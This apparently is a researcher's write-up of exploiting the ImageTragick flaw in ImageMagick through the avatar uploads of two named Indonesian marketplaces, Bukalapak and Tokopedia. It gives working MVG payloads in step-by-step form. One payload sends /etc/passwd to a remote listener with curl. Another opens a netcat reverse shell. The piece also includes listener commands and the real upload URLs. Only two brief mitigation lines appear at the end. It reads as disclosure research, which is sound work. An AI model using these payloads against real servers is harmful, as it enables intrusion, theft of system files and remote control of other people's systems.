So after I created CTF challenge on Botani CTF about imagetragick, I’m curious, are there any web apps that still vulnerable to this bug, then I started to test to well-known startups in Indonesia that are Bukalapak and Tokopedia. Bukalapak and Tokopedia are C2C marketplace in Indonesia where anyone can open online store to serve prospective buyer from all over Indonesia.
Imagetragick bug discovered 3 month ago by Nikolay Ermishkin. The bug affects imagemagick version 6.9.3 or lower. Basically, imagemagick will try to retrieve file (in this case an image) before conversion process if file provide url string, similar to SSRF bug except url parameter can be escaped to gain remote code execution due to url parameter not filtered properly. Here an example:
$ convert 'https://hrdn.us";|ls "-la' tmp.png total 32 drwxr-xr-x 6 hrdn hrdn 204 Jun 11 21:01 . drwxr-xr-x 232 hrdn hrdn 7888 Jun 11 11:37 ..
When testing imagetragick bug I come around file upload feature, I want to try upload file mvg that contain my payload. These 2 startups provide file upload feature in profile page where user can upload avatar.
Step to reproduce
Create file avatar.jpg, we use mvg format which recognized by imagetragick.
push graphic-context viewbox 0 0 640 480 fill 'url(https://whatev.er";| [RCE HERE] | touch "hello)' pop graphic-context
We can execute command and send the result using curl
push graphic-context viewbox 0 0 640 480 fill 'url(https://whatev.er";| cat /etc/passwd | curl -d @- [ip:port] | touch "hello' pop graphic-context
First, we need to create listener using netcat on our server.
$ nc -lvp 9700 Listening on [0.0.0.0] (family 0, port 9700)
Then, visit profile page https://www.bukalapak.com/users/your_user_id/edit and upload the payload avatar.jpg
Voila! we got feedback from Bukalapak server
Gaining reverse shell
We can construct reverse shell payload that provided by pentest-monkey, I personally use netcat reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip] [port] >/tmp/f
This time, we will try execute payload on Tokopedia. Just like Bukalapak, Tokopedia also vulnerable on avatar upload feature. Create file payload, avatar.jpg.
push graphic-context viewbox 0 0 640 480 fill 'url(https://whatev.er";| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [your ip] [your port] >/tmp/f | touch "hello' pop graphic-context
And then create listener as above, port number doesn’t matter as long as its not collide to another program or below 1024 (reserved port number).
$ nc -lvp 31337 Listening on [0.0.0.0] (family 0, port 31337)
Visit profile page https://www.tokopedia.com/people/your_user_id/edit and upload the payload
We got reverse shell
- Update imagemagick to latest version
- Fix policies http://www.imagemagick.org/discourse-server/viewtopic.php?t=29588